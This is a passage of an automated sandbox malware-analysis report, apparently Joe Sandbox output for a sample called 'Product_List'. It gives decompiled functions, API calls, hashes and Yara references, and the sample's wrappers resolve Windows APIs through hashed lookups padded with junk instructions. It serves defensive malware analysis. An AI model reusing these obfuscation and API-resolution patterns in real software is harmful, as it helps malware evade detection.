                                                      • Opcode ID: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                                      • Instruction ID: 97372187852fa5e1adf49ca0e465a128001ac0af3e8014b44584ab3ce766e153
                                                      • Opcode Fuzzy Hash: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                                      • Instruction Fuzzy Hash: 95019B71A8031876E7216691DC42FEF776C9B44B54F54012DFF047A1C2D6E8AA0587E9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E9C5 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 431 41e9c5-41e9d0 432 41e9b3-41e9c3 431->432 433 41e9d2-41e9ed call 41f1b3 431->433 436 41e9f2-41ea07 LookupPrivilegeValueW 433->436
                                                      C-Code - Quality: 64%
                                                      			E0041E9C5(void* __eax, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t16;

				asm("o16 fstp tword [esi-0x25de8b42]");
				asm("loop 0xffffffe3");
				ss = _v117;
				_t13 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _t13, _t13 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}





                                                      0x0041e9c9
                                                      0x0041e9d0
                                                      0x0041e9d2
                                                      0x0041e9d6
                                                      0x0041e9ed
                                                      0x0041ea03
                                                      0x0041ea07

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                                      • Instruction ID: 0263855f051aa3e283c50ba551ccbdc2edf87f179c8fe257d40e8d7a90bbd0ca
                                                      • Opcode Fuzzy Hash: 6f107fde87a0e8a750ff240edea467a3f14f8b87ff78edc713b099ff39960363
                                                      • Instruction Fuzzy Hash: 07F06DB6604204BFCB20DF99DC81EEB77A9EF88754F108559FD4C97281C636E811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E865 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 443 41e865-41e88a call 41f1b3 445 41e88f-41e8a4 RtlFreeHeap 443->445
                                                      C-Code - Quality: 72%
                                                      			E0041E865(intOrPtr __eax, void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t17;

				asm("lds ebp, [esi]");
				 *0x9cc116e9 = __eax;
				 *__edi =  *__edi - __ebx +  *((intOrPtr*)(__esi - 0x2d));
				_t14 = _a4;
				_push(__esi);
				_t8 = _t14 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t14, _t8,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}





                                                      0x0041e868
                                                      0x0041e86a
                                                      0x0041e86f
                                                      0x0041e876
                                                      0x0041e87c
                                                      0x0041e882
                                                      0x0041e88a
                                                      0x0041e8a0
                                                      0x0041e8a4

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                                      • Instruction ID: db7fe254e23705c02db2d6c613c9e7060c507d673460d2e0dd7a4286191a99f8
                                                      • Opcode Fuzzy Hash: b94de72b573e1966a3b4a1d5ffd8d631a89efd798ee2835b689f99938b8a0aac
                                                      • Instruction Fuzzy Hash: 79F08CB1640205AFCB14DF69CC45EEB7BA9EF89344F14455AF98897282D231D815CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410043 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E00410043(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                      0x0041005d
                                                      0x00410067
                                                      0x0041006d
                                                      0x0041007c
                                                      0x0041006a
                                                      0x0041006a
                                                      0x0041006a

                                                      APIs
                                                      • GetUserGeoID.KERNELBASE(00000010), ref: 0041006D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: User
                                                      • String ID:
                                                      • API String ID: 765557111-0
                                                      • Opcode ID: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                                      • Instruction ID: ada836e890b82e0dd553c32112272efd72bacd2a7c40ed4153c4fba82fb23b99
                                                      • Opcode Fuzzy Hash: 6840ff3954171594db79a7b87b7635f560bde1a2aabe693af1b59c88e19e6c7a
                                                      • Instruction Fuzzy Hash: 13E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E873(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                      0x0041e882
                                                      0x0041e88a
                                                      0x0041e8a0
                                                      0x0041e8a4

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,9F072898,00000000,?), ref: 0041E8A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                      • Instruction ID: 1886f6a66617dfe5414ac9ff53834b0e5857080f48b025a3e0b38d79a8bd7b6d
                                                      • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                      • Instruction Fuzzy Hash: 10E012B2200208ABCB14EF89DC49EA737ACAF88754F018059BE095B282C630E914CAF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E833 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E833(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                      0x0041e842
                                                      0x0041e84a
                                                      0x0041e860
                                                      0x0041e864

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E860
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                      • Instruction ID: df2cfb87f9ff2096fd868703bf6a6fcec91ae6a8f85b57d06528ce7919eb225c
                                                      • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                      • Instruction Fuzzy Hash: 36E012B2210208ABCB14EF89DC45EA737ACAF88664F018059BE085B242C630F9148AF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E9D3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E9D3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                      0x0041e9ed
                                                      0x0041ea03
                                                      0x0041ea07

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                                      • Instruction ID: 942ffc3d2e0f3bdfb5ddf09c923354268ae6cb2a01bd98db3201c95a286cb933
                                                      • Opcode Fuzzy Hash: e363481e85907f674112753f3c70bf454170a1c5c2cc0076f0ceacd14441f91a
                                                      • Instruction Fuzzy Hash: D6E01AB1600304ABC710DF49CC45EE737ADEF88654F014065BE0D57242C635F8148AF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 13e32d79c821461ea556fb4f08dca71d8d58ee133448aea44063e8506232a8ae
                                                      • Instruction ID: ec7df66e3dee724d35016613aad4ecdd39e7863daa7158fee0ac70295e99e065
                                                      • Opcode Fuzzy Hash: 13e32d79c821461ea556fb4f08dca71d8d58ee133448aea44063e8506232a8ae
                                                      • Instruction Fuzzy Hash: 6DB09B719054D5CAD651D7A44608717F900BBD4745F56C171D2020641B8778D091F5B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0181B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0181B38F
                                                      • *** Inpage error in %ws:%s, xrefs: 0181B418
                                                      • <unknown>, xrefs: 0181B27E, 0181B2D1, 0181B350, 0181B399, 0181B417, 0181B48E
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0181B484
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0181B53F
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0181B48F
                                                      • write to, xrefs: 0181B4A6
                                                      • The resource is owned shared by %d threads, xrefs: 0181B37E
                                                      • *** then kb to get the faulting stack, xrefs: 0181B51C
                                                      • Go determine why that thread has not released the critical section., xrefs: 0181B3C5
                                                      • a NULL pointer, xrefs: 0181B4E0
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0181B352
                                                      • *** enter .cxr %p for the context, xrefs: 0181B50D
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0181B39B
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0181B2DC
                                                      • The resource is owned exclusively by thread %p, xrefs: 0181B374
                                                      • read from, xrefs: 0181B4AD, 0181B4B2
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0181B3D6
                                                      • The critical section is owned by thread %p., xrefs: 0181B3B9
                                                      • The instruction at %p tried to %s , xrefs: 0181B4B6
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0181B2F3
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0181B47D
                                                      • *** enter .exr %p for the exception record, xrefs: 0181B4F1
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0181B305
                                                      • The instruction at %p referenced memory at %p., xrefs: 0181B432
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0181B476
                                                      • an invalid address, %p, xrefs: 0181B4CF
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0181B314
                                                      • This failed because of error %Ix., xrefs: 0181B446
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0181B323
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: c6cc5ce7645a88988f95da48aea2384d721d56276d068193cb0fd803248e17c8
                                                      • Instruction ID: 2d834d07fecc4e07be30079fc046d726a622238eda987bdc3532321669973165
                                                      • Opcode Fuzzy Hash: c6cc5ce7645a88988f95da48aea2384d721d56276d068193cb0fd803248e17c8
                                                      • Instruction Fuzzy Hash: 60812972A40200FFDB316B4ACC99D6BBF39EF56755F40404CFA049B21AD2B59651CBB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01773D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E01773D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01771B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01771B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01771B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01771B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01771B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01784620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E017B1370(_t276, 0x1744e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017ABB40(0,  &_v68, _t170);
									if(L017743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017ABB40(_t257,  &_v68, _t243);
								if(L017743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E017B1370(_t278, 0x1744e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01784620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E017B1370(_v16, 0x1744e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017ABB40(_t262,  &_v68, _t244);
								if(L017743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E017B1370(_t282, 0x1744e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017ABB40(_t262,  &_v68, _t201);
							if(L017743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01784620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E017B1370(_t280, 0x1744e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017ABB40(_t267,  &_v68, _t245);
							if(L017743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E017B1370(_t284, 0x1744e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017ABB40(_t267,  &_v68, _t224);
						if(L017743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x01773d3c
                                                      0x01773d42
                                                      0x01773d44
                                                      0x01773d46
                                                      0x01773d49
                                                      0x01773d4c
                                                      0x01773d4f
                                                      0x01773d52
                                                      0x01773d55
                                                      0x01773d58
                                                      0x01773d5b
                                                      0x01773d5f
                                                      0x01773d61
                                                      0x01773d66
                                                      0x017c8213
                                                      0x017c8218
                                                      0x01774085
                                                      0x01774088
                                                      0x0177408e
                                                      0x01774094
                                                      0x0177409a
                                                      0x017740a0
                                                      0x017740a6
                                                      0x017740a9
                                                      0x017740af
                                                      0x017740b6
                                                      0x017740bd
                                                      0x017740bd
                                                      0x01773d83
                                                      0x017c821f
                                                      0x017c8229
                                                      0x017c8238
                                                      0x017c8238
                                                      0x017c823d
                                                      0x017c823d
                                                      0x01773da0
                                                      0x01773daf
                                                      0x01773db5
                                                      0x01773dba
                                                      0x01773dba
                                                      0x01773dd4
                                                      0x01773e94
                                                      0x01773eab
                                                      0x01773f6d
                                                      0x01773f84
                                                      0x0177406b
                                                      0x0177406b
                                                      0x0177406e
                                                      0x0177406e
                                                      0x01774070
                                                      0x01774074
                                                      0x017c8351
                                                      0x017c8351
                                                      0x0177407a
                                                      0x0177407f
                                                      0x017c835d
                                                      0x017c8370
                                                      0x017c8377
                                                      0x017c8379
                                                      0x017c837c
                                                      0x017c837c
                                                      0x017c835d
                                                      0x00000000
                                                      0x0177407f
                                                      0x01773f8a
                                                      0x01773f8d
                                                      0x01773f90
                                                      0x01773f95
                                                      0x017c830d
                                                      0x017c830f
                                                      0x01773f9b
                                                      0x01773fac
                                                      0x01773fae
                                                      0x01773fb1
                                                      0x01773fb1
                                                      0x01773fb6
                                                      0x017c8317
                                                      0x017c831a
                                                      0x00000000
                                                      0x01773fbc
                                                      0x01773fc1
                                                      0x01773fc9
                                                      0x01773fd7
                                                      0x01773fda
                                                      0x01773fdd
                                                      0x01774021
                                                      0x01774021
                                                      0x01774029
                                                      0x01774030
                                                      0x01774044
                                                      0x01774046
                                                      0x01774046
                                                      0x01774044
                                                      0x01774049
                                                      0x017c8327
                                                      0x017c8334
                                                      0x017c8339
                                                      0x017c833c
                                                      0x0177404f
                                                      0x0177404f
                                                      0x0177404f
                                                      0x01774051
                                                      0x01774056
                                                      0x01774063
                                                      0x01774063
                                                      0x01774068
                                                      0x00000000
                                                      0x01774068
                                                      0x01773fdf
                                                      0x01773fe2
                                                      0x01773fe4
                                                      0x01773fe7
                                                      0x01773fef
                                                      0x01774003
                                                      0x01774005
                                                      0x01774005
                                                      0x0177400c
                                                      0x01774013
                                                      0x01774016
                                                      0x01774017
                                                      0x0177401b
                                                      0x0177401e
                                                      0x00000000
                                                      0x0177401e
                                                      0x01773fb6
                                                      0x01773eb1
                                                      0x01773eb4
                                                      0x01773eb7
                                                      0x01773ebc
                                                      0x017c82a9
                                                      0x017c82ab
                                                      0x01773ec2
                                                      0x01773ed3
                                                      0x01773ed5
                                                      0x01773ed8
                                                      0x01773ed8
                                                      0x01773edd
                                                      0x017c82b3
                                                      0x017c82b6
                                                      0x00000000
                                                      0x01773ee3
                                                      0x01773ee8
                                                      0x01773eed
                                                      0x01773ef0
                                                      0x01773ef3
                                                      0x01773f02
                                                      0x01773f05
                                                      0x01773f08
                                                      0x017c82c0
                                                      0x017c82c3
                                                      0x017c82c5
                                                      0x017c82c8
                                                      0x017c82d0
                                                      0x017c82e4
                                                      0x017c82e6
                                                      0x017c82e6
                                                      0x017c82ed
                                                      0x017c82f4
                                                      0x017c82f7
                                                      0x017c82f8
                                                      0x017c82fc
                                                      0x017c82ff
                                                      0x017c82ff
                                                      0x01773f0e
                                                      0x01773f11
                                                      0x01773f16
                                                      0x01773f1d
                                                      0x01773f31
                                                      0x017c8307
                                                      0x017c8307
                                                      0x01773f31
                                                      0x01773f39
                                                      0x01773f48
                                                      0x01773f4d
                                                      0x01773f50
                                                      0x01773f50
                                                      0x01773f53
                                                      0x01773f58
                                                      0x01773f65
                                                      0x01773f65
                                                      0x01773f6a
                                                      0x00000000
                                                      0x01773f6a
                                                      0x01773edd
                                                      0x01773dda
                                                      0x01773ddd
                                                      0x01773de0
                                                      0x01773de5
                                                      0x017c8245
                                                      0x01773deb
                                                      0x01773df7
                                                      0x01773dfc
                                                      0x01773dfe
                                                      0x01773e01
                                                      0x01773e01
                                                      0x01773e06
                                                      0x017c824d
                                                      0x017c824f
                                                      0x017c8254
                                                      0x00000000
                                                      0x01773e0c
                                                      0x01773e11
                                                      0x01773e16
                                                      0x01773e19
                                                      0x01773e29
                                                      0x01773e2c
                                                      0x01773e2f
                                                      0x017c825c
                                                      0x017c825f
                                                      0x017c8261
                                                      0x017c8264
                                                      0x017c826c
                                                      0x017c8280
                                                      0x017c8282
                                                      0x017c8282
                                                      0x017c8289
                                                      0x017c8290
                                                      0x017c8293
                                                      0x017c8294
                                                      0x017c8298
                                                      0x017c829b
                                                      0x017c829b
                                                      0x01773e35
                                                      0x01773e38
                                                      0x01773e3d
                                                      0x01773e44
                                                      0x01773e58
                                                      0x017c82a3
                                                      0x017c82a3
                                                      0x01773e58
                                                      0x01773e60
                                                      0x01773e6f
                                                      0x01773e74
                                                      0x01773e77
                                                      0x01773e77
